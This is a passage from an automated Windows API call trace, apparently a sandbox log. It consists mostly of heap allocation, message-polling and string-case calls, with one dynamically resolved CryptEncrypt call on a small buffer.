returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.134] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0263.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9b70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0263.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.136] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0263.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0263.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2170 | out: hHeap=0x25c0000) returned 1 [0263.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0263.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2190 | out: hHeap=0x25c0000) returned 1 [0263.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0263.136] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0263.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0263.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0263.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0263.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0263.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0263.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0263.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0263.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0263.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0263.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0263.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0263.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0263.138] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0263.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.139] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.139] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.139] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.139] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.139] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.140] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0263.140] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0263.140] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.140] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0263.140] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.140] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0263.140] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0263.140] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0263.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0263.141] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0263.141] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.141] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0263.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0263.141] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.141] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.142] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.142] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.142] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.142] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.142] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.142] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.142] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.142] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.143] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.143] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.143] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.143] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0263.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.144] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0263.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0263.144] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0263.144] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0263.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0263.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.144] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0263.144] 